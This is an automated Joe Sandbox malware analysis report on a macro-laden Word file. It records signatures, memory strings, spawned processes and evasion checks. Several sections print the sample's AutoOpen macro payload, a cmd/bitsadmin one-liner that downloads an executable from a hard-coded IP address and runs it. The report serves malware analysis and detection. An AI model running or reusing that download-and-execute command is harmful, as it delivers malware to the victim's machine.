Analysis Report

Overview

General Information

Joe Sandbox Version:	17.0.0
Analysis ID:	204881
Start time:	17:34:12
Joe Sandbox Product:	Cloud
Start date:	12.01.2017
Overall analysis duration:	0h 5m 29s
Report type:	full
Sample file name:	2e374756930bee59c371d98ff88572a8.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal64.evad.expl.winDOC@7/12@0/0
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel document Simulate clicks Found new Word/Excel, stop clicking Number of clicks 70 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	64	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Networking:

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:/2e374756930bee59c371d98ff88572a8.doc
Source: WINWORD.EXE	String found in binary or memory: file:///c:/2e374756930bee59c371d98ff88572a8.docj-dw
Source: WINWORD.EXE	String found in binary or memory: file:///c:/2e374756930bee59c371d98ff88572a8.docw-dw
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/sofwilliams/appdata/local/microsoft/office/winword.exe_rules.xml
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/sofwilliams/appdata/local/microsoft/office/winword.exe_rules.xmlro
Source: MSOSQM.EXE	String found in binary or memory: file:///c:/windows/performance/winsat/datastore/2011-08-17%2009.00.52.786%20formal.assessment%20(rec
Source: MSOSQM.EXE	String found in binary or memory: file://c:
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://
Source: bitsadmin.exe	String found in binary or memory: http://93.170.104.98/jbmfkjfre.exe
Source: cmd.exe	String found in binary or memory: http://93.170.104.98/jbmfkjfre.exe%tmp%
Source: bitsadmin.exe	String found in binary or memory: http://93.170.104.98/jbmfkjfre.exec:
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/stat/images/onedriveupsell.png
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesignupupsell
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesyncclientupsell
Source: WINWORD.EXE	String found in binary or memory: http://cdp1.public-trust.com/crl/omniroot2025.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: WINWORD.EXE	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: WINWORD.EXE	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0%
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0-
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0/
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com05
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net03
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net0d
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.msocsp.com0=
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.msocsp.com0n
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://odc.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: WINWORD.EXE	String found in binary or memory: http://schema
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: WINWORD.EXE	String found in binary or memory: http://weather.service.msn.com/data.aspx-v2
Source: WINWORD.EXE	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WINWORD.EXE	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: WINWORD.EXE	String found in binary or memory: http://www.usertrust.com1
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://api.aadrm.com/
Source: WINWORD.EXE	String found in binary or memory: https://api.aadrm.com/vijk
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE	String found in binary or memory: https://apis.live.net/v5.0/neg&
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://broadcast.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://contacts.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://directory.services.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://excelcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://excelps.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: WINWORD.EXE	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediambi_ssl_shortssl.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://login.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizev
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizew
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://nexus.
Source: WINWORD.EXE	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?application=winword.exe&version=15.0.4691.1000&isceip=
Source: WINWORD.EXE	String found in binary or memory: https://nexus.officeapps.live.com;
Source: WINWORD.EXE	String found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rules?application=winword.exe&version=15.0.4691.1000&is
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ocws.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://odc.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE	String found in binary or memory: https://officeapps.live.com5
Source: WINWORD.EXE	String found in binary or memory: https://officeapps.live.coma1
Source: WINWORD.EXE	String found in binary or memory: https://officeapps.live.comw
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ols.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/partnerprovisioning.svc/v1/subscriptions
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/wlx.profiles.ic.json
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptps.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptss.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptwrs.
Source: 2e374756930bee59c371d98ff88572a8.doc	String found in binary or memory: https://products.office.com/
Source: WINWORD.EXE, 2e374756930bee59c371d98ff88572a8.doc	String found in binary or memory: https://products.office.com/yx
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://profile.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://roaming.
Source: WINWORD.EXE	String found in binary or memory: https://secure.comodo.com/cps0
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://signup.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ssl.bing.com/dict/?view=officemoe&ulang=zh-cn&tlang=en-us
Source: WINWORD.EXE	String found in binary or memory: https://ssl.bing.com/dict/?view=officemoe&ulang=zh-cn&tlang=en-us
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ssl.bing.com/dict/img/bingdict_e2c.png
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://wordcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://wordps.

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\sofwilliams\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5BDD8AA-6045-4FAA-B6AA-F8FE539091F6}.tmp

Found strings which match to known social media urls

Show sources

Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Persistence and Installation Behavior:

May use bcdedit to modify the Windows boot settings

Show sources

Source: cmd.exe

Binary or memory string: Ebcdedit.exe

Tries to download files via bitsadmin

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

Stream path 'Macros/VBA/NewMacros' : High entropy of concatenated variable names

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\Upgrades

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\15.0\ClickToRun

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office 15\Root\Office15\MSVCR100.dll

Classification label

Show sources

Source: classification engine

Classification label: mal64.evad.expl.winDOC@7/12@0/0

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\sofwilliams\AppData\Roaming\Microsoft\Office\Recent\2e374756930bee59c371d98ff88572a8.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\SOFWIL~1\AppData\Local\Temp\CVR97CE.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

OLE document summary: title field not present or empty

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ........1#........... ..L."...".E..J........1#......@F.J. ..L."...A.....V..J............L."........w........`.....,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ..........................0.................t8...................................e.w.......w..k.....L.......8........;..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ..............0.....B.I.T.S.A.D.M.I.N. .v.e.r.s.i.o.n. .3...0. .[. .7...5...7.6.0.1. .]...........7.X...H....;......8...
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ..........0.........B.I.T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7.\...<............-.w
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.....R............r..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ........................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.....d...................
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.......7...................\|.
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.......7......................r..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ........................t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.......7.........p................r..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................U.n.a.b.l.e. .t.o. .c.o.n.n.e.c.t. .t.o. .B.I.T.S. .-. .0.x.8.0.0.7.0.4.2.2.........P...`.....,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ................................................................Y..w................'..w.q..h......w........`.....,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ................................................................Y..w................'..w.q..h......w..............,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ................................................................Y..w................'..w.q..h......w........`.....,.....

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\bitsadmin.exe
Source: unknown	Process created: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Document contains embedded VBA macros

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File read: C:\Windows\System32\drivers\etc\hosts

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen			Name: AutoOpen

Document contains an embedded VBA macro which may execute processes

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc	OLE, VBA macro line: Shell nUKaI61f, 0
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen, API Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0:Integer)			Name: AutoOpen

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc	OLE, VBA macro line: Set SHswlL = CreateObject("vbscript.regexp")
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function MJCTM, String createobject: Set SHswlL = CreateObject("vbscript.regexp")			Name: MJCTM

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\bitsadmin.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Checks the free space of harddrives

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE	File Volume queried: C:\Program Files FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE	File Volume queried: C:\Windows\System32 FullSizeInformation

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\bitsadmin.exe TID: 3684

Thread sleep time: -60000s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE	Process information set: NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

Stream path 'Data' entropy: 7.9301420367 (max. 8.0)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Queries time zone information

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Persistence and Installation Behavior:

Data Obfuscation:

System Summary:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot